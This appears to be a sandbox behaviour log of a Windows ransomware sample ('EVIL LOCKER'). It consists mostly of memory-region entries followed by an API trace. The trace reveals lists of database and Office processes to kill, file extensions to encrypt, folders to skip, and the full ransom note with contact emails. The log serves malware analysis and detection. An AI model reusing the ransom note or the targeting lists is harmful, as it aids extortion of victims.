"private_0x00000084b2e20000" filename = "" Region: id = 5805 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5806 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5807 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5808 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5809 start_va = 0x84b2e20000 end_va = 0x84b2f29fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5810 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5811 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5812 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5813 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5814 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5815 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5816 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5817 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5818 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5819 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5820 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5821 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5822 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5823 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5824 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5825 start_va = 0x84b2e20000 end_va = 0x84b2f29fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5826 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5827 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5828 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5829 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5830 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5831 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5832 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5833 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5834 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5835 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5836 start_va = 0x84b2e20000 end_va = 0x84b2f28fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5837 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5838 start_va = 0x84b2e20000 end_va = 0x84b2f2afff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5839 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5840 start_va = 0x84b2e20000 end_va = 0x84b2f24fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5841 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5842 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5843 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5844 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5845 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5846 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5847 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5848 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5849 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5850 start_va = 0x84b2e20000 end_va = 0x84b2f2afff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5851 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5852 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5853 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5854 start_va = 0x84b2e20000 end_va = 0x84b2f24fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5855 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5856 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5857 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5858 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5859 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5860 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5861 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5862 start_va = 0x84b2e20000 end_va = 0x84b2f2afff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5863 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5864 start_va = 0x84b2e20000 end_va = 0x84b2f24fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5865 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5866 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5867 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5868 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5869 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5870 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5871 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5872 start_va = 0x84b2e20000 end_va = 0x84b2f28fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5873 start_va = 0x84b2e20000 end_va = 0x84b2f2afff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5874 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5875 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5876 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5877 start_va = 0x84b2e20000 end_va = 0x84b2f28fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5878 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5879 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5880 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5881 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5882 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5883 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5884 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5885 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5886 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5887 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5888 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5889 start_va = 0x84b2e20000 end_va = 0x84b2f29fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5890 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5891 start_va = 0x84b2e20000 end_va = 0x84b2f2bfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5892 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5893 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5894 start_va = 0x84b2e20000 end_va = 0x84b2f24fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5895 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5896 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5897 start_va = 0x84b2e20000 end_va = 0x84b2f2cfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5898 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5899 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5900 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5901 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5902 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5903 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5904 start_va = 0x84b2e20000 end_va = 0x84b2f24fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5905 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5906 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5907 start_va = 0x84b2e20000 end_va = 0x84b2f26fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5908 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5909 start_va = 0x84b2e20000 end_va = 0x84b2f28fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5910 start_va = 0x84b2e20000 end_va = 0x84b2f21fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5911 start_va = 0x84b3030000 end_va = 0x84b3140fff entry_point = 0x0 region_type = private name = "private_0x00000084b3030000" filename = "" Region: id = 5912 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5913 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5914 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5915 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5916 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5917 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5918 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5919 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5920 start_va = 0x84b2e20000 end_va = 0x84b2f2ffff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5921 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5922 start_va = 0x84b2e20000 end_va = 0x84b2f27fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5923 start_va = 0x84b2e20000 end_va = 0x84b2f28fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5924 start_va = 0x84b2e20000 end_va = 0x84b2f25fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5925 start_va = 0x84b2e20000 end_va = 0x84b2f29fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5926 start_va = 0x84b2e20000 end_va = 0x84b2f22fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5927 start_va = 0x84b2e20000 end_va = 0x84b2f2dfff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5928 start_va = 0x84b2e20000 end_va = 0x84b2f2efff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5929 start_va = 0x84b2e20000 end_va = 0x84b2f29fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Region: id = 5930 start_va = 0x84b2e20000 end_va = 0x84b2f23fff entry_point = 0x0 region_type = private name = "private_0x00000084b2e20000" filename = "" Thread: id = 1 os_tid = 0xb3c [0057.418] GetStartupInfoW (in: lpStartupInfo=0x84b0fdf9d0 | out: lpStartupInfo=0x84b0fdf9d0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0057.419] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6c01f0000 [0057.419] __set_app_type (_Type=0x2) [0057.419] _onexit (_Func=0x7ff6c01fb3c0) returned 0x7ff6c01fb3c0 [0057.419] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x7ffc01360000 [0057.419] GetProcAddress (hModule=0x7ffc01360000, lpProcName="InitializeConditionVariable") returned 0x7ffc03ed87e0 [0057.419] GetProcAddress (hModule=0x7ffc01360000, lpProcName="SleepConditionVariableCS") returned 0x7ffc013c5f30 [0057.420] GetProcAddress (hModule=0x7ffc01360000, lpProcName="WakeAllConditionVariable") returned 0x7ffc03e79a40 [0057.420] RtlInitializeConditionVariable (in: ConditionVariable=0x7ff6c02244e0 | out: ConditionVariable=0x7ff6c02244e0) [0057.420] _onexit (_Func=0x7ff6c01fba6c) returned 0x7ff6c01fba6c [0057.420] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6c01f1588) returned 0x0 [0057.420] __getmainargs (in: _Argc=0x7ff6c0224508, _Argv=0x7ff6c0224518, _Env=0x7ff6c0224510, _DoWildCard=0, _StartInfo=0x7ff6c0224524 | out: _Argc=0x7ff6c0224508, _Argv=0x7ff6c0224518, _Env=0x7ff6c0224510) returned 0 [0057.421] _onexit (_Func=0x7ff6c0210b70) returned 0x7ff6c0210b70 [0057.421] _onexit (_Func=0x7ff6c0210ce0) returned 0x7ff6c0210ce0 [0057.421] _onexit (_Func=0x7ff6c0210c80) returned 0x7ff6c0210c80 [0057.421] _onexit (_Func=0x7ff6c0210bd0) returned 0x7ff6c0210bd0 [0057.421] _onexit (_Func=0x7ff6c0210c40) returned 0x7ff6c0210c40 [0057.421] _onexit (_Func=0x7ff6c0210b54) returned 0x7ff6c0210b54 [0057.421] _onexit (_Func=0x7ff6c0210a8c) returned 0x7ff6c0210a8c [0057.422] strlen (_Str="AAD") returned 0x3 [0057.422] _onexit (_Func=0x7ff6c0210a80) returned 0x7ff6c0210a80 [0057.422] wcslen (_String="sqlbrowser.exe") returned 0xe [0057.422] wcslen (_String="sqlwriter.exe") returned 0xd [0057.422] wcslen (_String="sqlservr.exe") returned 0xc [0057.422] wcslen (_String="msmdsrv.exe") returned 0xb [0057.423] wcslen (_String="MsDtsSrvr.exe") returned 0xd [0057.423] wcslen (_String="sqlceip.exe") returned 0xb [0057.423] wcslen (_String="fdlauncher.exe") returned 0xe [0057.423] wcslen (_String="Ssms.exe") returned 0x8 [0057.423] wcslen (_String="sqlserv.exe") returned 0xb [0057.423] wcslen (_String="oracle.exe") returned 0xa [0057.423] wcslen (_String="ntdbsmgr.exe") returned 0xc [0057.423] wcslen (_String="ReportingServecesService.exe") returned 0x1c [0057.423] wcslen (_String="fdhost.exe") returned 0xa [0057.423] wcslen (_String="SQLAGENT.EXE") returned 0xc [0057.424] wcslen (_String="ReportingServicesService.exe") returned 0x1c [0057.424] wcslen (_String="msftesql.exe") returned 0xc [0057.424] wcslen (_String="pg_ctl.exe") returned 0xa [0057.424] wcslen (_String="postgres.exe") returned 0xc [0057.424] wcslen (_String="UniFi.exe") returned 0x9 [0057.424] wcslen (_String="sqlagent.exe") returned 0xc [0057.424] wcslen (_String="ocssd.exe") returned 0x9 [0057.424] wcslen (_String="dbsnmp.exe") returned 0xa [0057.424] wcslen (_String="synctime.exe") returned 0xc [0057.424] wcslen (_String="mydesctopservice.exe") returned 0x14 [0057.425] wcslen (_String="ocautoupds.exe") returned 0xe [0057.425] wcslen (_String="agntsvc.exeagntsvc.exe") returned 0x16 [0057.425] wcslen (_String="agntsvc.exeencsvc.exe") returned 0x15 [0057.425] wcslen (_String="firefoxconfig.exe") returned 0x11 [0057.425] wcslen (_String="tbirdconfig.exe") returned 0xf [0057.425] wcslen (_String="ocomm.exe") returned 0x9 [0057.425] wcslen (_String="mysqld.exe") returned 0xa [0057.425] wcslen (_String="mysqld-nt.exe") returned 0xd [0057.425] wcslen (_String="mysqld-opt.exe") returned 0xe [0057.425] wcslen (_String="dbeng50.exe") returned 0xb [0057.425] wcslen (_String="sqbcoreservice.exe") returned 0x12 [0057.425] wcslen (_String="excel.exe") returned 0x9 [0057.426] wcslen (_String="infopath.exe") returned 0xc [0057.426] wcslen (_String="msaccess.exe") returned 0xc [0057.426] wcslen (_String="mspub.exe") returned 0x9 [0057.426] wcslen (_String="onenote.exe") returned 0xb [0057.426] wcslen (_String="outlook.exe") returned 0xb [0057.426] wcslen (_String="powerpnt.exe") returned 0xc [0057.426] wcslen (_String="steam.exe") returned 0x9 [0057.426] wcslen (_String="thebat.exe") returned 0xa [0057.427] wcslen (_String="thebat64.exe") returned 0xc [0057.427] wcslen (_String="thunderbird.exe") returned 0xf [0057.427] wcslen (_String="visio.exe") returned 0x9 [0057.427] wcslen (_String="winword.exe") returned 0xb [0057.427] wcslen (_String="wordpad.exe") returned 0xb [0057.430] _onexit (_Func=0x7ff6c0210b30) returned 0x7ff6c0210b30 [0057.430] wcslen (_String=".sql") returned 0x4 [0057.431] wcslen (_String=".mdf") returned 0x4 [0057.431] wcslen (_String=".txt") returned 0x4 [0057.431] wcslen (_String=".dbf") returned 0x4 [0057.431] wcslen (_String=".ckp") returned 0x4 [0057.431] wcslen (_String=".dacpac") returned 0x7 [0057.431] wcslen (_String=".db3") returned 0x4 [0057.431] wcslen (_String=".dtxs") returned 0x5 [0057.431] wcslen (_String=".mdt") returned 0x4 [0057.431] wcslen (_String=".sdf") returned 0x4 [0057.431] wcslen (_String=".MDF") returned 0x4 [0057.431] wcslen (_String=".DBF") returned 0x4 [0057.431] _onexit (_Func=0x7ff6c0210b18) returned 0x7ff6c0210b18 [0057.431] wcslen (_String="C:\\Program Files (x86)\\Microsoft SQL Server\\") returned 0x2c [0057.432] wcslen (_String="C:\\Program Files\\Microsoft SQL Server\\") returned 0x26 [0057.432] _onexit (_Func=0x7ff6c0210b48) returned 0x7ff6c0210b48 [0057.432] wcslen (_String="Windows") returned 0x7 [0057.432] wcslen (_String="windows") returned 0x7 [0057.432] wcslen (_String="Program files") returned 0xd [0057.432] wcslen (_String="Program files (x86)") returned 0x13 [0057.432] wcslen (_String="system volume information") returned 0x19 [0057.432] wcslen (_String="$recycle.bin") returned 0xc [0057.433] _onexit (_Func=0x7ff6c0210ae0) returned 0x7ff6c0210ae0 [0057.433] wcslen (_String=".[evil@cock.lu].EVIL") returned 0x14 [0057.433] _onexit (_Func=0x7ff6c0210b0c) returned 0x7ff6c0210b0c [0057.433] strlen (_Str=" >>>>>>>>>>>>>>>>>>>>>>>>>>>> EVIL LOCKER <<<<<<<<<<<<<<<<<<<<<<<<<<<<\n\n HELLO, DEAR FRIEND!\n\n1. [ ALL YOUR FILES HAVE BEEN ENCRYPTED! ]\n Your files are NOT damaged! Your files are modified only. This modification is reversible.\n The only 1 way to decrypt your files is to receive the decryption program.\n\n2. [ HOW TO RECOVERY FILES? ]\n To receive the decryption program write on our e-mail: evil@cock.lu or evil@firemail.cc\n And in subject write your ID: ID-${CODE}\n We send you full instruction how to decrypt all your files.\n\n3. [ FREE DECRYPTION! ]\n Free decryption as guarantee.\n We guarantee the receipt of the decryption program after payment.\n To believe, you can give us up to 3 files that we decrypt for free.\n Files should not be important to you! (databases, backups, large excel sheets, etc.)\n\n >>>>>>>>>>>>>>>>>>>>>>>>>>>> EVIL LOCKER <<<<<<<<<<<<<<<<<<<<<<<<<<<<\n") returned 0x396 [0057.433] _onexit (_Func=0x7ff6c0210b3c) returned 0x7ff6c0210b3c [0057.433] _onexit (_Func=0x7ff6c0210b24) returned 0x7ff6c0210b24 [0057.434] _aligned_malloc (_Size=0x10, _Alignment=0x10) returned 0x84b1167fc0 [0057.434] _onexit (_Func=0x7ff6c0210aec) returned 0x7ff6c0210aec [0057.434] _onexit (_Func=0x7ff6c0210a9c) returned 0x7ff6c0210a9c [0057.434] _onexit (_Func=0x7ff6c0210cfc) returned 0x7ff6c0210cfc [0057.434] _onexit (_Func=0x7ff6c0210cec) returned 0x7ff6c0210cec [0057.434] _onexit (_Func=0x7ff6c0210d18) returned 0x7ff6c0210d18 [0057.434] _onexit (_Func=0x7ff6c0210d0c) returned 0x7ff6c0210d0c [0057.435] _onexit (_Func=0x7ff6c0210d34) returned 0x7ff6c0210d34 [0057.435] _onexit (_Func=0x7ff6c0210d28) returned 0x7ff6c0210d28 [0057.435] _onexit (_Func=0x7ff6c0210d9c) returned 0x7ff6c0210d9c [0057.435] _onexit (_Func=0x7ff6c0210d90) returned 0x7ff6c0210d90 [0057.435] _onexit (_Func=0x7ff6c0210d84) returned 0x7ff6c0210d84 [0057.435] _onexit (_Func=0x7ff6c0210db8) returned 0x7ff6c0210db8 [0057.435] _onexit (_Func=0x7ff6c0210dac) returned 0x7ff6c0210dac [0057.436] _onexit (_Func=0x7ff6c0210dd4) returned 0x7ff6c0210dd4 [0057.436] _onexit (_Func=0x7ff6c0210dc8) returned 0x7ff6c0210dc8 [0057.436] _onexit (_Func=0x7ff6c0210dfc) returned 0x7ff6c0210dfc [0057.436] _onexit (_Func=0x7ff6c0210df0) returned 0x7ff6c0210df0 [0057.436] _onexit (_Func=0x7ff6c0210de4) returned 0x7ff6c0210de4 [0057.436] _onexit (_Func=0x7ff6c0210e24) returned 0x7ff6c0210e24 [0057.437] _onexit (_Func=0x7ff6c0210e18) returned 0x7ff6c0210e18 [0057.437] _onexit (_Func=0x7ff6c0210e0c) returned 0x7ff6c0210e0c [0057.437] _onexit (_Func=0x7ff6c0210e4c) returned 0x7ff6c0210e4c [0057.437] _onexit (_Func=0x7ff6c0210e40) returned 0x7ff6c0210e40 [0057.437] _onexit (_Func=0x7ff6c0210e34) returned 0x7ff6c0210e34 [0057.437] _onexit (_Func=0x7ff6c0210e68) returned 0x7ff6c0210e68 [0057.437] _onexit (_Func=0x7ff6c0210e5c) returned 0x7ff6c0210e5c [0057.437] _onexit (_Func=0x7ff6c0210e84) returned 0x7ff6c0210e84 [0057.438] _onexit (_Func=0x7ff6c0210e78) returned 0x7ff6c0210e78 [0057.438] _onexit (_Func=0x7ff6c0210ea0) returned 0x7ff6c0210ea0 [0057.438] _onexit (_Func=0x7ff6c0210e94) returned 0x7ff6c0210e94 [0057.438] _onexit (_Func=0x7ff6c0210ebc) returned 0x7ff6c0210ebc [0057.438] _onexit (_Func=0x7ff6c0210eb0) returned 0x7ff6c0210eb0 [0057.438] _onexit (_Func=0x7ff6c0210ed8) returned 0x7ff6c0210ed8 [0057.438] _onexit (_Func=0x7ff6c0210ecc) returned 0x7ff6c0210ecc [0057.438] _onexit (_Func=0x7ff6c0210ef4) returned 0x7ff6c0210ef4 [0057.439] _onexit (_Func=0x7ff6c0210ee8) returned 0x7ff6c0210ee8 [0057.439] _onexit 